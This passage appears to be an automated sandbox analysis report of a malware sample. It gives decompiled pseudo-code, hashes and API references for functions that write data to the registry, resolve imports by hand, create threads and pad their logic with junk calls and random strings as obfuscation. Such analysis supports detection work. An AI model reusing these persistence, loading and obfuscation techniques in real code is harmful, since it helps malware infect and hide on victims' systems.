API ID: ChangeCloseCreateFileFindMetaNotification
String ID: =6$Global$reYjfEaAzMCVX,YCBNnQxx9VLC 3,6qO5pyc9Py KVNueaP0rXWLKmyN0vo7 soQ3N9x3AplVOAuJssLHm8a0a9IrhEXFpS,6UN30Yec.MQNWflysfcs SZ2a17U,Cy0 2FzR0Jq5YyU5LVDkIo55nFYMaFlR3P1 VuTda 40t2eCp8QU1M9 1D.MAVObhQEyq2uc7JHONrDaVqiKPo4nSuuwOVKMrC hl sih8YsjkKDdtWsU,WzZZW5cKlkPlnaYCa
API String ID: 3318744322-1503166811
Opcode ID: 3bab30c0bcd32403705e5ebc3fa8090408cc5d3b2bf95a47294989b146ad6962
Instruction ID: ada175acb67c49b90feabeaa08e48723bc9a7a4fa6a48328eef9a849e51243c8
Opcode Fuzzy Hash: 3bab30c0bcd32403705e5ebc3fa8090408cc5d3b2bf95a47294989b146ad6962
Instruction Fuzzy Hash: AF116DB6800208FFCB00EF95EE4ADAD7BF8EB84310B111069F905B7291D6325B06DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00ED12C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00ED12C0(signed int __eax, char* __ecx, void* __edx, void* __fp0, intOrPtr _a4, void* _a8, char _a12) {
				char* _v12;
				char* _v16;
				char _v20;
				int _v24;
				char _v28;
				char _v48;
				char _v60;
				char _v328;
				char _v2832;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				char* _t57;
				void* _t67;
				long _t74;
				long _t83;
				long _t86;
				void* _t91;
				signed int _t92;
				char* _t93;
				char* _t105;
				char* _t107;
				intOrPtr _t108;

				_t48 = __eax;
				_t92 = __eax;
				_t107 = __ecx;
				if(_a8 == 0 || __eax == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t114 = __ecx;
					if(__ecx == 0) {
						goto L13;
					}
					_v12 = __ecx;
					_v28 = E00ECEF54( *((intOrPtr*)(_a4 + 0x108)),  &_v12, 4);
					E00EDCDD2( *((intOrPtr*)(_a4 + 0x108)) + _t107,  &_v2832);
					_t57 = E00EDCF06(_t114, __fp0,  &_v2832, 0, 0x64);
					_v16 = _t57;
					_v24 = _t57 + _t92 + 6;
					_t105 = E00ECD239(_t57 + _t92 + 6);
					_v12 = _t105;
					if(_t105 != 0) {
						 *_t105 = _a12;
						_t16 = _t105 + 6; // 0x6
						 *((char*)(_t105 + 1)) = 1;
						 *((intOrPtr*)(_t105 + 2)) = _t92;
						E00ECD177(_t16, _a8, _t92);
						_t21 = _t92 + 6; // 0x6
						E00EDCF76( &_v2832, _t105 + _t21, _v16);
						_v20 = _t107;
						_t108 = _a4;
						_v16 =  *((intOrPtr*)(_t108 + 0x108));
						_t93 =  &_v48;
						_t67 = 8;
						E00ED745C(_t67, _t93,  &_v20);
						_push( &_v328);
						_push(0x14);
						_push(_t93);
						E00ED39F9( &_v20);
						_push( &_v328);
						_push(_v24);
						_push(_t105);
						E00ED3924();
						_t74 = E00ED197A(_t108);
						_v16 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t33 =  &_v28; // 0xef2869
							E00ECE245( *_t33,  &_v60, 0x10);
							_t83 = RegOpenKeyExA( *(_t108 + 0x10c), _v16, 0, 2,  &_a8);
							__eflags = _t83;
							if(_t83 == 0) {
								_t86 = RegSetValueExA(_a8,  &_v60, 0, 3, _v12, _v24);
								__eflags = _t86;
								if(_t86 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a8);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E00ECD1EA( &_v16, 0xffffffff);
						}
						E00ECD1EA( &_v12, 0);
						return 0;
					}
					_t91 = 0xfffffffe;
					return _t91;
				}
			}

0x00ed12c0
0x00ed12d0
0x00ed12d2
0x00ed12d4
0x00ed143f
0x00ed143f
0x00ed143f
0x00000000
0x00ed12e2
0x00ed12e2
0x00ed12e4
0x00000000
0x00000000
0x00ed12fb
0x00ed1303
0x00ed1310
0x00ed1320
0x00ed1325
0x00ed132d
0x00ed1335
0x00ed133a
0x00ed133f
0x00ed134c
0x00ed1352
0x00ed1355
0x00ed135a
0x00ed135d
0x00ed1365
0x00ed1371
0x00ed1376
0x00ed1379
0x00ed1382
0x00ed1387
0x00ed138a
0x00ed138e
0x00ed1399
0x00ed139c
0x00ed139e
0x00ed139f
0x00ed13aa
0x00ed13ab
0x00ed13ae
0x00ed13af
0x00ed13b9
0x00ed13be
0x00ed13c1
0x00ed13c3
0x00ed13c5
0x00ed13cd
0x00ed13ea
0x00ed13ed
0x00ed13ef
0x00ed140c
0x00ed140f
0x00ed1411
0x00ed1413
0x00ed1415
0x00ed1415
0x00ed141e
0x00ed13f1
0x00ed13f1
0x00ed13f3
0x00ed13f3
0x00ed1427
0x00ed142d
0x00ed1434
0x00000000
0x00ed143b
0x00ed1343
0x00000000
0x00ed1343

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 00ED13EA

Strings

i(, xrefs: 00ED13C5

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapOpen
String ID: i(
API String ID: 4287083251-1135972139
Opcode ID: 68cab78252068995fc2559131340d251b890fca7ce4f2b3a4056eabda1db7af9
Instruction ID: c13dfa33c88e1a08ffb87775c1341e0f6ac52540d36c574fcb97626d3abeeba3
Opcode Fuzzy Hash: 68cab78252068995fc2559131340d251b890fca7ce4f2b3a4056eabda1db7af9
Instruction Fuzzy Hash: A2416D76900209BFDB119FA4DC81FEEBBB8EF04324F105166F524B7291D7719A468B50

Uniqueness

Uniqueness Score: -1.00%

Function 00EDCBC6, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00EDCBC6(signed int __eax, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _v24;
				signed int _v28;
				signed int _v32;
				struct HINSTANCE__* _v36;
				signed int* _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				struct HINSTANCE__* _t115;
				void* _t157;

				_v8 = _v8 & 0x00000000;
				if(_a4 != 0) {
					_v24 = GetModuleHandleA("kernel32.dll");
					_v12 = E00ED0350(_v24, "GetProcAddress");
					_v16 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v20 = _v16;
					if( *((intOrPtr*)(_v20 + 0x80)) == 0) {
						L24:
						return 0;
					}
					_v32 = 0x80000000;
					_t18 = _v20 + 0x80; // 0xff00ef56
					_v44 = _a4 +  *_t18;
					while( *((intOrPtr*)(_v44 + 0xc)) != 0) {
						_v44 = _v44 + 0x14;
					}
					_t26 = _v20 + 0x80; // 0xff00ef56
					_v44 = _a4 +  *_t26;
					while( *((intOrPtr*)(_v44 + 0xc)) != 0) {
						_t115 = LoadLibraryA( *((intOrPtr*)(_v44 + 0xc)) + _a4); // executed
						_v36 = _t115;
						if(_v36 != 0) {
							if( *_v44 == 0) {
								_v40 =  *((intOrPtr*)(_v44 + 0x10)) + _a4;
							} else {
								_v40 =  *_v44 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v40 != 0) {
								_v64 = _v64 & 0x00000000;
								_v60 = _v60 & 0x00000000;
								_v52 = _v52 & 0x00000000;
								_v56 = _v56 & 0x00000000;
								if(( *_v40 & _v32) == 0) {
									_v48 =  *_v40 + _a4;
									_v56 = _v48 + 2;
									_v64 =  *( *((intOrPtr*)(_v44 + 0x10)) + _a4 + _v28);
									_v60 = _v12(_v36, _v56);
								} else {
									_v64 =  *_v40;
									_v56 = _v64 & 0x0000ffff;
									_v60 = _v12(_v36, _v56);
								}
								if(_v64 != _v60) {
									_v8 = _v8 + 1;
									if( *((intOrPtr*)(_v44 + 0x10)) == 0) {
										 *_v40 = _v60;
									} else {
										 *( *((intOrPtr*)(_v44 + 0x10)) + _a4 + _v28) = _v60;
									}
								}
								_v40 =  &(_v40[1]);
								_v28 = _v28 + 4;
							}
							_v44 = _v44 + 0x14;
							continue;
						}
						_t157 = 0xfffffffd;
						return _t157;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x00edcbcc
0x00edcbd4
0x00edcbe9
0x00edcbfb
0x00edcc07
0x00edcc0d
0x00edcc1a
0x00edcd7d
0x00000000
0x00edcd7d
0x00edcc20
0x00edcc2d
0x00edcc33
0x00edcc36
0x00edcc45
0x00edcc45
0x00edcc50
0x00edcc56
0x00edcc59
0x00edcc70
0x00edcc76
0x00edcc7d
0x00edcc8d
0x00edcca5
0x00edcc8f
0x00edcc97
0x00edcc97
0x00edcca8
0x00edccac
0x00edccb8
0x00edccbc
0x00edccc0
0x00edccc4
0x00edccd0
0x00edccfb
0x00edcd03
0x00edcd15
0x00edcd21
0x00edccd2
0x00edccd7
0x00edcce2
0x00edccee
0x00edccee
0x00edcd2a
0x00edcd30
0x00edcd3a
0x00edcd56
0x00edcd3c
0x00edcd4b
0x00edcd4b
0x00edcd3a
0x00edcd5e
0x00edcd67
0x00edcd67
0x00edcd75
0x00000000
0x00edcd75
0x00edcc81
0x00000000
0x00edcc81
0x00000000
0x00edcc59
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00EC1CC5,?), ref: 00EDCBE3
LoadLibraryA.KERNELBASE(00000000), ref: 00EDCC70

Strings

GetProcAddress, xrefs: 00EDCBEC
kernel32.dll, xrefs: 00EDCBDE

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 11534701390fab4b0eaa7158b911d2bfc0bee4bd0f5980febd991680c498c4cc
Instruction ID: 8eb74fbd415321c40b29dd6836f451f8440d535cd49e37e92d5a2feb5cdfa32d
Opcode Fuzzy Hash: 11534701390fab4b0eaa7158b911d2bfc0bee4bd0f5980febd991680c498c4cc
Instruction Fuzzy Hash: A8615775910209AFCB04CF98D885AECBBF1FF08365F2454A9E815BB361D734A981CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0F67, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134
threadCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00ED0F67(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a12, char _a16) {
				signed int _v8;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				void* _t88;
				struct _SECURITY_ATTRIBUTES* _t89;
				intOrPtr _t96;
				intOrPtr _t98;
				void* _t99;
				signed int _t101;
				intOrPtr _t106;
				intOrPtr _t112;
				void* _t114;
				signed int _t116;
				void* _t118;

				_t50 =  *0xef56c8; // 0x520f6c8
				_t89 = 0;
				_t51 =  *((intOrPtr*)(_t50 + 0x2c))( *0xef57b0, 0x7530, _t88, __ecx);
				if(_t51 == 0 || _t51 == 0x80) {
					_v8 = _t89;
					_t114 = 0;
					do {
						_t52 =  *0xef5754; // 0x51f2ca0
						_t53 =  *((intOrPtr*)(_t114 + _t52));
						if(_t53 == _t89) {
							L7:
							_t54 =  *0xef5754; // 0x51f2ca0
							if( *((intOrPtr*)(_t114 + _t54)) == _t89) {
								_t116 = _v8 << 5;
								if(_a8 == _t89) {
									 *(_t116 + _t54 + 0x10) = _t89;
									_t55 =  *0xef5754; // 0x51f2ca0
									 *(_t116 + _t55 + 0xc) = _t89;
									L14:
									_t56 =  *0xef5754; // 0x51f2ca0
									_t24 =  &_a16; // 0xec45e2
									 *((intOrPtr*)(_t116 + _t56 + 0x14)) =  *_t24;
									_t57 =  *0xef5754; // 0x51f2ca0
									 *((intOrPtr*)(_t116 + _t57 + 8)) = _a4;
									_t58 = E00ED341E(_t89, 1); // executed
									_t96 =  *0xef5754; // 0x51f2ca0
									 *((intOrPtr*)(_t116 + _t96 + 0x1c)) = _t58;
									_t59 =  *0xef5754; // 0x51f2ca0
									_t32 = _t59 + _t116 + 4; // 0x51f2ca4
									_t62 = CreateThread(_t89, _t89, E00ED0EA7, _t59 + _t116, _t89, _t32);
									_t98 =  *0xef5754; // 0x51f2ca0
									 *(_t116 + _t98) = _t62;
									_t63 =  *0xef5754; // 0x51f2ca0
									_t99 =  *(_t63 + _t116);
									if(_t99 != _t89) {
										SetThreadPriority(_t99, 0xffffffff);
										_t65 =  *0xef5754; // 0x51f2ca0
										_t66 =  *0xef56c8; // 0x520f6c8
										 *0xef5750 =  *0xef5750 + 1;
										 *((intOrPtr*)(_t66 + 0x90))( *((intOrPtr*)(_t116 + _t65 + 0x1c)));
										_t68 =  *0xef5754; // 0x51f2ca0
										_t89 = _t116 + _t68;
									} else {
										_t72 =  *0xef56c8; // 0x520f6c8
										 *((intOrPtr*)(_t72 + 0x30))( *((intOrPtr*)(_t63 + _t116 + 0x1c)));
										_t74 =  *0xef5754; // 0x51f2ca0
										_t40 = _t116 + 0xc; // 0x51f2cac
										_t100 = _t74 + _t40;
										if( *((intOrPtr*)(_t74 + _t40)) != _t89) {
											E00ECD1EA(_t100,  *((intOrPtr*)(_t74 + _t116 + 0x10)));
										}
										_t75 =  *0xef5754; // 0x51f2ca0
										_t101 = 8;
										memset(_t116 + _t75, 0, _t101 << 2);
									}
									L19:
									L20:
									_t69 =  *0xef56c8; // 0x520f6c8
									 *((intOrPtr*)(_t69 + 0x90))( *0xef57b0);
									_t71 = _t89;
									goto L21;
								}
								_t10 =  &_a12; // 0xec406f
								_t112 =  *_t10;
								_t79 = E00ECD239(_t112);
								_t106 =  *0xef5754; // 0x51f2ca0
								 *((intOrPtr*)(_t116 + _t106 + 0xc)) = _t79;
								_t80 =  *0xef5754; // 0x51f2ca0
								if( *((intOrPtr*)(_t80 + _t116 + 0xc)) == _t89) {
									goto L19;
								}
								 *((intOrPtr*)(_t80 + _t116 + 0x10)) = _t112;
								_t81 =  *0xef5754; // 0x51f2ca0
								E00ECD177( *((intOrPtr*)(_t116 + _t81 + 0xc)), _a8, _t112);
								_t118 = _t118 + 0xc;
								goto L14;
							}
							goto L8;
						}
						_push(_t89);
						_push(_t53);
						_t83 =  *0xef56c8; // 0x520f6c8
						if( *((intOrPtr*)(_t83 + 0x2c))() == 0x102) {
							goto L8;
						}
						_t85 =  *0xef5754; // 0x51f2ca0
						E00ED0EFA(_t85 + _t114, _t89);
						goto L7;
						L8:
						_v8 = _v8 + 1;
						_t114 = _t114 + 0x20;
					} while (_t114 < 0x1000);
					goto L20;
				} else {
					_t71 = 0;
					L21:
					return _t71;
				}
			}

0x00ed0f6b
0x00ed0f7c
0x00ed0f7e
0x00ed0f83
0x00ed0f94
0x00ed0f97
0x00ed0f99
0x00ed0f99
0x00ed0f9e
0x00ed0fa3
0x00ed0fc4
0x00ed0fc4
0x00ed0fcc
0x00ed0fe4
0x00ed0feb
0x00ed102b
0x00ed102f
0x00ed1034
0x00ed1038
0x00ed1038
0x00ed103d
0x00ed1040
0x00ed1044
0x00ed104f
0x00ed1053
0x00ed105a
0x00ed1060
0x00ed1064
0x00ed106b
0x00ed107d
0x00ed1080
0x00ed1086
0x00ed1089
0x00ed108e
0x00ed1093
0x00ed10ce
0x00ed10d4
0x00ed10dd
0x00ed10e2
0x00ed10e8
0x00ed10ee
0x00ed10f3
0x00ed1095
0x00ed1099
0x00ed109e
0x00ed10a1
0x00ed10a6
0x00ed10a6
0x00ed10ac
0x00ed10b3
0x00ed10b9
0x00ed10ba
0x00ed10c4
0x00ed10c7
0x00ed10c7
0x00ed10f6
0x00ed10f7
0x00ed10fd
0x00ed1102
0x00ed1108
0x00000000
0x00ed110a
0x00ed0fed
0x00ed0fed
0x00ed0ff1
0x00ed0ff7
0x00ed0ffd
0x00ed1001
0x00ed100a
0x00000000
0x00000000
0x00ed1014
0x00ed1018
0x00ed1021
0x00ed1026
0x00000000
0x00ed1026
0x00000000
0x00ed0fcc
0x00ed0fa5
0x00ed0fa6
0x00ed0fa7
0x00ed0fb4
0x00000000
0x00000000
0x00ed0fb6
0x00ed0fbe
0x00000000
0x00ed0fce
0x00ed0fce
0x00ed0fd1
0x00ed0fd4
0x00000000
0x00ed0f8c
0x00ed0f8c
0x00ed110b
0x00ed110d
0x00ed110d

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00010EA7,051F2CA0,00000000,051F2CA4,00000000,00EF5770,?,?,?,00EC45E2,00EC406F,00000000,00000000,00000000), ref: 00ED107D

Strings

E, xrefs: 00ED103D
o@, xrefs: 00ED0FED, 00ED0FF0, 00ED1010

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateThread
String ID: o@$E
API String ID: 2422867632-929680261
Opcode ID: 38c28486d5f8eae5ce6bb30e7703e1f227efbe59b20ef27803435561055e8807
Instruction ID: c24c1b7163790c32fc24f34b513d6ac8379520db00b5b0d4fd2d9b5ea414e6fe
Opcode Fuzzy Hash: 38c28486d5f8eae5ce6bb30e7703e1f227efbe59b20ef27803435561055e8807
Instruction Fuzzy Hash: 5C518C72210A00EFC725EF5AED84D6677F6FB58304B55446AEA0AAB3A1C735E849CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2B0B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00EC2B0B(void* __eflags) {
				char _v8;
				intOrPtr _v12;
				void* _v24;
				char _v64;
				void* __esi;
				intOrPtr _t15;
				char _t20;
				signed int _t23;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t38;
				char* _t50;
				char _t51;

				_t15 =  *0xef56a8; // 0xf00000
				_t50 =  &_v64;
				E00ECEE1F(_t50, __eflags,  *((intOrPtr*)(_t15 + 0xac)) + 3);
				_t20 = E00ED3A6B();
				_push(0);
				_push(_t50);
				_v8 = _t20;
				_t51 = E00ECE7FC(_t20);
				_t4 =  &_v8; // 0xec45ea
				_v12 = _t51;
				_t23 = E00ED02B3(_t4);
				_v8 = _t51;
				if(_t51 != 0) {
					_t24 = E00ECD239(0x80000); // executed
					 *0xef569c = _t24; // executed
					IsValidCodePage(0x1c);
					__eflags =  *0xef569c; // 0x5000020
					if(__eflags != 0) {
						ArcTo(0, 0x4a, 0x5b, 0x1c, 0x2c, 0x25, 0x4e, 0x5a, 0x59);
						_t27 = E00ECE32D( &_v24);
						__eflags = _t27;
						if(_t27 < 0) {
							_v24 = 0;
						}
						__eflags = 0 - _v24;
						asm("sbb eax, eax");
						_t30 =  *0xef56c8; // 0x520f6c8
						_t31 =  *((intOrPtr*)(_t30 + 0xd0))(_v12, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v24);
						 *0xef56a0 = _t31;
						__eflags = _t31 - 0xffffffff;
						if(_t31 != 0xffffffff) {
							E00ECE3F5( &_v24); // executed
							BitBlt(0, 0x19, 0x32, 0x37, 1, 0, 0xa, 0x58, 4);
							_t34 = E00ED0F67( &_v24, E00EC2C43, 0, 0, 0); // executed
							__eflags = _t34;
							if(_t34 != 0) {
								goto L11;
							}
							_t38 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t38 + 0x30))( *0xef56a0);
							_push(0xfffffffd);
							goto L10;
						} else {
							 *0xef56a0 = 0;
							_push(0xfffffffe);
							L10:
							_pop(0);
							L11:
							_t14 =  &_v8; // 0xec45ea
							E00ECD1EA(_t14, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L10;
				}
				return _t23 | 0xffffffff;
			}

0x00ec2b11
0x00ec2b22
0x00ec2b27
0x00ec2b31
0x00ec2b36
0x00ec2b39
0x00ec2b3b
0x00ec2b43
0x00ec2b48
0x00ec2b4b
0x00ec2b4e
0x00ec2b53
0x00ec2b58
0x00ec2b69
0x00ec2b71
0x00ec2b76
0x00ec2b7c
0x00ec2b82
0x00ec2b9c
0x00ec2ba5
0x00ec2baa
0x00ec2bac
0x00ec2bae
0x00ec2bae
0x00ec2bb3
0x00ec2bb9
0x00ec2bbe
0x00ec2bd5
0x00ec2bdb
0x00ec2be0
0x00ec2be3
0x00ec2bef
0x00ec2c04
0x00ec2c12
0x00ec2c1a
0x00ec2c1c
0x00000000
0x00000000
0x00ec2c24
0x00ec2c29
0x00ec2c2c
0x00000000
0x00ec2be5
0x00ec2be5
0x00ec2beb
0x00ec2c2e
0x00ec2c2e
0x00ec2c2f
0x00ec2c2f
0x00ec2c35
0x00000000
0x00ec2c3e
0x00ec2be3
0x00ec2b84
0x00000000
0x00ec2b84
0x00000000

APIs

Part of subcall function 00ECE7FC: lstrcatA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00ED161A,00000000,00EEF744,?,00000000,00000000,00000001), ref: 00ECE83B

IsValidCodePage.KERNELBASE(0000001C,00000000,?,?,00EF5770), ref: 00EC2B76

Strings

E, xrefs: 00EC2B48, 00EC2C2F, 00EC2C34

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CodePageValidlstrcat
String ID: E
API String ID: 1603461812-3015059025
Opcode ID: 56f3938b50ecee42fa4bbfbf871129882e333e9c43680f43996959ec05fe3402
Instruction ID: c5a9456613d02a634c55e1c3e233aab4251591b0828f93a31b7d9ae1c6eac580
Opcode Fuzzy Hash: 56f3938b50ecee42fa4bbfbf871129882e333e9c43680f43996959ec05fe3402
Instruction Fuzzy Hash: 23312871A40709BFE710AB64DD87FAE77A8EB10724F50062DF321FA2D1DA715D018B10

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC21E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00EDC21E(void* __fp0) {
				char _v5;
				char _v20;
				short _v84;
				signed int _t8;
				intOrPtr _t10;
				void* _t12;
				void* _t15;
				void* _t16;
				signed int _t22;
				void* _t28;
				signed int _t33;
				void* _t36;
				void* _t38;
				void* _t40;

				_t8 = E00ECD239(8);
				 *0xef5664 = _t8;
				if(_t8 != 0) {
					_t10 =  *0xef56a8; // 0xf00000
					_t12 = E00ED337F(_t10 + 0x228, _t8 + 4); // executed
					_t33 =  *0xef5664; // 0x520fa88
					 *_t33 = _t12;
					__eflags = _t12;
					if(_t12 == 0) {
						Arc(0, 0x32, 0x17, 0x3c, 0x23, 0x62, 0x23, 2, 0x13);
						GetLastError();
						_t15 = E00ECFE78("DdeZPg1Uv,8ls6TtkpzouvaIAwgnetaAO.7Hztw.3Zp,seFtTLrxNAKJdv5qTkp0DlWwVBM23KjdQVP7OBfZULfkmuwz1KuVtCBRmWY9nCAwuWYIcPFIIppXtD8n 9 VhvX jmQXvezV pJfjvoYMI7VtwstQ2ISKQu.,h0W qL8jE61YPt9Ut.4970YFiGM.R J.NXWZj29,XtL0ge2 e2S NwZ5I2Esf306,fxR0HMRoh.hALh75Bj,r8EUvS7ZfBHJ7 PsR9a8UC69RtNUXS8loPoIsQ0s.QX5Q9l8E11TsiXAnsRV 4nUd6xbyF0CyfNN0WxKemDVPdh,BnXjJemdwblqxZWh  yZNX fWCt6CimPEL7EkhyB6g sZHehYyKjtHzdX KwIkxcjItgWygZ7PHpkKXpCyLhGALFWSVDjHcyPfOBLr6AYgCyynhcyM,AbyiizHfZacZNtHVoeEcdf9okjqgOHA1x598tIrXak 85dDis7.6d bkg3MVC9XRSKQYoCqQOESOi8UHhxMLOrUYJCDieD9VNO9,WaKdu5I57WkZKpa4 0BOGBrQoM17RJslmaXpcCtnZDUBUjb4pJt.dZQDLe5ltsHHxAXn2bTAE3JVlRqjo6jMPib.kr3 hZx8zaLjZ5ax9LUmi9xFaXqYjtR8Wj MC,wmNtpj pt b.iPWMmfDovGn0zDF8f1aw,hYgLd3YfI4XDPYlx HNk jRFUReFZ");
						_t38 = 0xf;
						__eflags = _t15 - _t38;
						if(_t15 <= _t38) {
							_t38 = _t15;
						}
						_t28 = 0;
						_v5 = 0;
						__eflags = _t38;
						if(_t38 != 0) {
							do {
								_t3 = _t28 + 0x42; // 0x42
								 *((char*)(_t40 + _t28 - 0x10)) = _t3;
								MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v84, 0x20);
								_t28 = _t28 + 1;
								__eflags = _t28 - _t38;
							} while (_t28 < _t38);
						}
						_t16 = 0xfffffffe;
						return _t16;
					} else {
						E00EDC00B();
						_t22 =  *0xef5664; // 0x520fa88
						E00EDBF85( *_t22,  *((intOrPtr*)(_t22 + 4)));
						_pop(_t36); // executed
						E00EDBFC9(_t36, __eflags, __fp0); // executed
						__eflags = 0;
						return 0;
					}
				} else {
					return _t8 | 0xffffffff;
				}
			}

0x00edc226
0x00edc22c
0x00edc233
0x00edc23e
0x00edc249
0x00edc250
0x00edc256
0x00edc258
0x00edc25a
0x00edc28f
0x00edc295
0x00edc2a0
0x00edc2a8
0x00edc2a9
0x00edc2ab
0x00edc2ad
0x00edc2ad
0x00edc2af
0x00edc2b1
0x00edc2b5
0x00edc2b7
0x00edc2b9
0x00edc2bb
0x00edc2be
0x00edc2d0
0x00edc2d6
0x00edc2d7
0x00edc2d7
0x00edc2b9
0x00edc2dd
0x00edc2e1
0x00edc25c
0x00edc25c
0x00edc261
0x00edc26b
0x00edc271
0x00edc272
0x00edc277
0x00edc27a
0x00edc27a
0x00edc235
0x00edc239
0x00edc239

Strings

DdeZPg1Uv,8ls6TtkpzouvaIAwgnetaAO.7Hztw.3Zp,seFtTLrxNAKJdv5qTkp0DlWwVBM23KjdQVP7OBfZULfkmuwz1KuVtCBRmWY9nCAwuWYIcPFIIppXtD8n 9 VhvX jmQXvezV pJfjvoYMI7VtwstQ2ISKQu.,h0W qL8jE61YPt9Ut.4970YFiGM.R J.NXWZj29,XtL0ge2 e2S NwZ5I2Esf306,fxR0HMRoh.hALh75Bj,r8EUvS7ZfBH, xrefs: 00EDC29B

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: DdeZPg1Uv,8ls6TtkpzouvaIAwgnetaAO.7Hztw.3Zp,seFtTLrxNAKJdv5qTkp0DlWwVBM23KjdQVP7OBfZULfkmuwz1KuVtCBRmWY9nCAwuWYIcPFIIppXtD8n 9 VhvX jmQXvezV pJfjvoYMI7VtwstQ2ISKQu.,h0W qL8jE61YPt9Ut.4970YFiGM.R J.NXWZj29,XtL0ge2 e2S NwZ5I2Esf306,fxR0HMRoh.hALh75Bj,r8EUvS7ZfBH
API String ID: 1279760036-1006471446
Opcode ID: d9340742e295b12497950e87d9113b8aa86134501509b68a7fbd237c830f876b
Instruction ID: 31f118227015e78f325b66215b0244229480325c07fe8c49fb81f52383d034f4
Opcode Fuzzy Hash: d9340742e295b12497950e87d9113b8aa86134501509b68a7fbd237c830f876b
Instruction Fuzzy Hash: 912124322447046FE711A7E8AC87F6937D9EB14BA4F201226F710FE2E2DAA1C806C240

Uniqueness

Uniqueness Score: -1.00%

Function 00EC41EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00EC41EC(void* __ebx, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char _v20;
				short _v84;
				char _v368;
				void* _t22;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				void* _t32;
				void* _t39;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t49;

				_t49 = __fp0;
				__imp__GetCPInfoExA(0x21, 0x45,  &_v368);
				_t22 = _a8 - 0x11;
				if(_t22 == 0) {
					L14:
					E00EDC405(_t41);
					L15:
					__eflags = 0;
					return 0;
				}
				_t25 = _t22 - 1;
				if(_t25 == 0) {
					_t26 =  *0xef56b0; // 0x520f818
					 *((intOrPtr*)(_t26 + 0x30))(0);
					_push(_a16);
					_push(_a12);
					_push(0x12);
					L13:
					_t28 =  *0xef56b0; // 0x520f818, executed
					return  *((intOrPtr*)(_t28 + 0x34))(_a4);
				}
				if(_t25 == 0x206) {
					GetLastError();
